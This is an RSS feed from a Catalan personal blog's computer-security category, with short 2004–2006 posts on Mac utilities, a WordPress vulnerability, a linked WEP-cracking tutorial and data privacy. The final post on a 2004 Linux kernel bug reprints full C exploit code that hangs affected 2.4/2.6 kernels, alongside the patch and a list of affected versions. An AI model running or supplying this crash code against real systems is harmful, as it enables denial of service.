<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>lo tomàs avança &#187; Seguretat informàtica</title>
	<atom:link href="http://lotomas.net/category/seguretat-informatica/feed/" rel="self" type="application/rss+xml" />
	<link>http://lotomas.net</link>
	<description>Esforç al 200%</description>
	<lastBuildDate>Tue, 09 Mar 2010 19:33:48 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>AppZaper i Undercover, descobrint aplicacions</title>
		<link>http://lotomas.net/2006/05/22/appzaper-i-undercover-descobrint-aplicacions/</link>
		<comments>http://lotomas.net/2006/05/22/appzaper-i-undercover-descobrint-aplicacions/#comments</comments>
		<pubDate>Mon, 22 May 2006 19:06:49 +0000</pubDate>
		<dc:creator>Tomàs Reverter</dc:creator>
				<category><![CDATA[MacOSX]]></category>
		<category><![CDATA[Seguretat informàtica]]></category>

		<guid isPermaLink="false">http://lotomas.net/2006/05/22/appzaper-i-undercover-descobrint-aplicacions/</guid>
		<description><![CDATA[Continuant amb aplicacions per Mac, parell de d&#8217;aplicacions recent descobertes:

AppZaper: bàsicament és una icona que es pot situar al Finder i que serveix per desinstalar aplicacions. El desinstalar aplicacions en Mac Os X és una cosa rarilla, ja que sempre queden restes pel disc dur. Doncs aquesta aplicació es dedica a buscar aquestes restes i [...]]]></description>
			<content:encoded><![CDATA[<p>Continuant amb aplicacions per Mac, parell de d&#8217;aplicacions recent descobertes:</p>
<ul>
<li><a href="http://www.appzapper.com/">AppZaper</a>: bàsicament és una icona que es pot situar al Finder i que serveix per desinstalar aplicacions. El desinstalar aplicacions en Mac Os X és una cosa rarilla, ja que sempre queden restes pel disc dur. Doncs aquesta aplicació es dedica a buscar aquestes restes i eliminar-les. (via <a href="http://www.tuaw.com/2006/05/22/appzapper-updated-to-version-1-5/">TUAW</a>).</li>
<li><a href="http://orbicule.com/undercover/works.html">Undercover</a>: és un programa de protecció contra lladres, imposibilitant l&#8217;ús de l&#8217;ordinador i enviant a través d&#8217;Internet informació sobre on es troba actualment, fotografies de qui l&#8217;esta utilitzant&#8230; I si tot això no funciona simularà una avaria per què el portin a reparar. Realment està ben pensat, i basa tota la seva protecció amb tenir el firmware protegit amb contrassenya. Segur que finalment se&#8217;l consegueixen saltar, però la per posar-ho difícil que no quedi (via <a href="http://www.genbeta.com/archivos/2006/05/21-undercover-innovador-sistema-.php">GenBeta</a>).</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://lotomas.net/2006/05/22/appzaper-i-undercover-descobrint-aplicacions/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Greu vulnerabilitat al WordPress 2.0 i 2.0.1</title>
		<link>http://lotomas.net/2006/03/01/greu-vulnerabilitat-al-wordpress-20-i-201/</link>
		<comments>http://lotomas.net/2006/03/01/greu-vulnerabilitat-al-wordpress-20-i-201/#comments</comments>
		<pubDate>Wed, 01 Mar 2006 18:26:18 +0000</pubDate>
		<dc:creator>Tomàs Reverter</dc:creator>
				<category><![CDATA[Seguretat informàtica]]></category>

		<guid isPermaLink="false">http://lotomas.net/2006/03/01/greu-vulnerabilitat-al-wordpress-20-i-201/</guid>
		<description><![CDATA[Descripció i solució a Mangas Verdes
]]></description>
			<content:encoded><![CDATA[<p>Descripció i solució a <a href="http://mangasverdes.es/2006/02/28/graves-vulnerabilidades-en-wordpress-20-y-201/#more-1788">Mangas Verdes</a></p>
]]></content:encoded>
			<wfw:commentRss>http://lotomas.net/2006/03/01/greu-vulnerabilitat-al-wordpress-20-i-201/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Com aconseguir les claus d’una encriptació WEP</title>
		<link>http://lotomas.net/2005/12/02/com-aconseguir-les-claus-d%e2%80%99una-encriptacio-wep/</link>
		<comments>http://lotomas.net/2005/12/02/com-aconseguir-les-claus-d%e2%80%99una-encriptacio-wep/#comments</comments>
		<pubDate>Fri, 02 Dec 2005 17:37:51 +0000</pubDate>
		<dc:creator>Tomàs Reverter</dc:creator>
				<category><![CDATA[GNU/Linux]]></category>
		<category><![CDATA[Seguretat informàtica]]></category>

		<guid isPermaLink="false">http://lotomas.net/2005/12/02/com-aconseguir-les-claus-d%e2%80%99una-encriptacio-wep/</guid>
		<description><![CDATA[
via Barrapunto, tutorial pas a pas, útil en futur:
Manual

]]></description>
			<content:encoded><![CDATA[<div class="storycontent">
<p>via <a href="http://barrapunto.com/article.pl?sid=05/12/02/0828227" target="_blank" tppabs="http://barrapunto.com/article.pl?sid=05/12/02/0828227">Barrapunto</a>, tutorial pas a pas, útil en futur:</p>
<p><a href="http://www.hckrs.org/proyectosabiertos/wep.html" target="_blank" tppabs="http://www.hckrs.org/proyectosabiertos/wep.html">Manual</a></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://lotomas.net/2005/12/02/com-aconseguir-les-claus-d%e2%80%99una-encriptacio-wep/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Clusters i privacitat de les dades</title>
		<link>http://lotomas.net/2004/11/17/clusters-i-privacitat-de-les-dades/</link>
		<comments>http://lotomas.net/2004/11/17/clusters-i-privacitat-de-les-dades/#comments</comments>
		<pubDate>Wed, 17 Nov 2004 07:36:44 +0000</pubDate>
		<dc:creator>Tomàs Reverter</dc:creator>
				<category><![CDATA[Informàtica]]></category>
		<category><![CDATA[Seguretat informàtica]]></category>

		<guid isPermaLink="false">http://lotomas.net/2004/11/17/clusters-i-privacitat-de-les-dades/</guid>
		<description><![CDATA[
No sé perquè avui he recordat dues coses i les he operat:
Paràmetres

Edgar caganseentodoloquesemenea&#160;pq el Carrefour li va enviar propaganda a casa, pq el tenien controlat a través de la tarja de crèdit.
Supercomputadors del top500.

Resultat: Integrity Superdome, 1.5 GHz, HPlex, alias el supercomputador número 269 de la llista top500 d&#8217;aquest novembre, pertanyent a&#8230;.. Carrefour d&#8217;Espanya!!!
&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;Application area: [...]]]></description>
			<content:encoded><![CDATA[<div class="storycontent">
<p>No sé perquè avui he recordat dues coses i les he operat:</p>
<p><u>Paràmetres</u></p>
<ul>
<li>Edgar <a href="http://www.lapeig.com/blog/arxius/2004/06/17/malparits/" tppabs="http://www.lapeig.com/blog/arxius/2004/06/17/malparits/">caganseentodoloquesemenea</a>&nbsp;pq el Carrefour li va enviar propaganda a casa, pq el tenien controlat a través de la tarja de crèdit.</li>
<li>Supercomputadors del <a href="http://www.top500.org/" tppabs="http://www.top500.org/">top500</a>.</li>
</ul>
<p><u>Resultat</u>: <a href="http://www.top500.org/sublist/System.php?id=7196" tppabs="http://www.top500.org/sublist/System.php?id=7196">Integrity Superdome, 1.5 GHz, HPlex</a>, alias el supercomputador número 269 de la llista top500 d&rsquo;aquest novembre, pertanyent a&hellip;.. Carrefour d&rsquo;Espanya!!!</p>
<p><!--StartFragment -->&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Application area: Database</p>
<p><u>Conclusió</u>: Edgar, quan compris al Carrefour i paguis en targeta somriu a la càmera, ja que les teves dades passaran a formar part d&rsquo;un dels grans supercomputadors de per aquí (amb el permís de <a href="http://www.top500.org/sublist/System.php?id=7119" tppabs="http://www.top500.org/sublist/System.php?id=7119">MareNostrum</a>, que ara és el 4t).</p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://lotomas.net/2004/11/17/clusters-i-privacitat-de-les-dades/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fallada de seguretat al nucli de GNU/Linux</title>
		<link>http://lotomas.net/2004/06/15/fallada-de-seguretat-al-nucli-de-gnulinux/</link>
		<comments>http://lotomas.net/2004/06/15/fallada-de-seguretat-al-nucli-de-gnulinux/#comments</comments>
		<pubDate>Tue, 15 Jun 2004 17:01:30 +0000</pubDate>
		<dc:creator>Tomàs Reverter</dc:creator>
				<category><![CDATA[Seguretat informàtica]]></category>

		<guid isPermaLink="false">http://lotomas.net/2004/06/15/fallada-de-seguretat-al-nucli-de-gnulinux/</guid>
		<description><![CDATA[
A diversos llocs (barrapunto, quands.info&#8230;) es fa ressó d&#8217;una nova fallada de seguretat a la majoria de nuclis actuals, 2.4.x i 2.6.x. Alguns punts a concretar són, per exemple, que l&#8217;exploit és local i no es pot aprofitar per aconseguir permisos de super usuari ni per comprometre les dades del sistema. O sigui, que te [...]]]></description>
			<content:encoded><![CDATA[<div class="storycontent">
<p>A diversos llocs (<a href="http://barrapunto.com/article.pl?sid=04/06/15/1410237&amp;mode=nested" tppabs="http://barrapunto.com/article.pl?sid=04/06/15/1410237&amp;mode=nested">barrapunto</a>, <a href="http://www.quands.info/2004/06/15.html#a2667" target="_blank" tppabs="http://www.quands.info/2004/06/15.html#a2667">quands.info</a>&hellip;) es fa ressó d&rsquo;una nova fallada de seguretat a la majoria de nuclis actuals, 2.4.x i 2.6.x. Alguns punts a concretar són, per exemple, que l&rsquo;exploit és local i no es pot aprofitar per aconseguir permisos de super usuari ni per comprometre les dades del sistema. O sigui, que te pega una penjada a sistema i ja està <img class="wp-smiley" alt=":)" src="http://lotomas.net/images/icon_smile.gif" tppabs="http://shinjix.net/wp-images/smilies/icon_smile.gif" /> </p>
<p>Com a curiositat geeeeeeens partidista, a la web de l&rsquo;<a href="http://www.agnix.org/index.php?option=content&amp;task=view&amp;id=187&amp;Itemid=2" tppabs="http://www.agnix.org/index.php?option=content&amp;task=view&amp;id=187&amp;Itemid=2">Associació d&rsquo;Usuaris GNIX</a> diuen:<br />&ldquo;15-06-2004<br />Se encontró un fallo de seguridad en todos los kernels, <b><u>excepto algunos de Gentoo</u></b>, y otros. Un usuario puede ejecutar un programa malicioso y causar que el sistema se pare.&rdquo;<br />Anda lo que ha dichooooo xDD</p>
<p>També proposa una senzilla solució:<br />&ldquo;Si ya has compilado un kernel solo tienes que cambiar una liña, En el fichero /usr/src/linux/include/asm-i386/i387.h Línea 51. Cambiar : asm volatile(&rdquo;fwait&rdquo;); Por: asm volatile(&rdquo;fnclex ; fwait&rdquo;);&rdquo;</p>
<p>La noticia original del bug la podem trobar a <a href="javascript:if(confirm('http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html  \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain external to an external domain.  \n\nDo you want to open it from the server?'))window.location='http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html'" target="_self" tppabs="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html">aquí</a>, dintre la web de <a href="javascript:if(confirm('http://linuxreviews.org/  \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain external to an external domain.  \n\nDo you want to open it from the server?'))window.location='http://linuxreviews.org/'" target="_self" tppabs="http://linuxreviews.org/">linuxreviews</a>, on hi ha una llista dels <a href="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc2" tppabs="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc2">kernels afectats</a>, els <a href="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc3" tppabs="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc3">no afectats</a> i <a href="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc6" tppabs="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc6">parches</a> per a totes les versions afectades.</p>
<p>Una llisteta:</p>
<p><u>Afectats</u></p>
<p># Linux 2.6.x<br />o 2.6.7-rc2<br />o 2.6.6 (vanilla)<br />o 2.6.6-rc1 SMP (verified by blaise)<br />o 2.6.6 SMP (verified by riven)<br />o 2.6.6-debian (verified by arturaz)<br />o 2.6.5-gentoo (verified by RatiX)<br />o 2.6.5-mm6 &#8211; (verified by Mariux)<br />o 2.6.5 (fedora core 2 vanilla)<br />o 2.6.3-13mdk (Mandrake) </p>
<p># Linux 2.4.2x<br />o 2.4.26 vanilla<br />o 2.4.26, grsecurity 2.0 config<br />o 2.4.26-rc1 vanilla<br />o 2.4.26-gentoo-r1<br />o 2.4.22<br />o 2.4.22-1.2188 Fedora FC1 Kernel<br />o 2.4.20 RH7.3 (gcc 2.96)<br />o 2.4.18-bf2.4 (debian woody vanilla) </p>
<p><u>No afectats</u><br /># Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith<br /># Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille<br /># Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)<br /># Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)<br /># Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)<br /># 2.2.19-kernel</p>
<p>Bé, aquí està tot. Fins i tot <a href="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc1" target="_blank" tppabs="http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc1">el codi maliciós</a>!! Pos és realment senzill:</p>
<p><font face="Courier New" size="2">#include &lt;&#8217;sys/time.h&#8217;&gt;<br />#include &lt;&#8217;signal.h&#8217;&gt;<br />#include &lt;&#8217;unistd.h&#8217;&gt;<br />static void Handler(int ignore)<br />{<br />char fpubuf[108];<br />__asm__ __volatile__ (&rdquo;fsave %0 &rdquo; : : &ldquo;m&rdquo;(fpubuf));<br />write(2, &ldquo;*&rdquo;, 1);<br />__asm__ __volatile__ (&rdquo;frstor %0 &rdquo; : : &ldquo;m&rdquo;(fpubuf));<br />}<br />int main(int argc, char *argv[])<br />{<br />struct itimerval spec;<br />signal(SIGALRM, Handler);<br />spec.it_interval.tv_sec=0;<br />spec.it_interval.tv_usec=100;<br />spec.it_value.tv_sec=0;<br />spec.it_value.tv_usec=100;<br />setitimer(ITIMER_REAL, &amp;spec, NULL);<br />while(1)<br />write(1, &ldquo;.&rdquo;, 1);<br />return 0;<br />}</font> </p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://lotomas.net/2004/06/15/fallada-de-seguretat-al-nucli-de-gnulinux/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
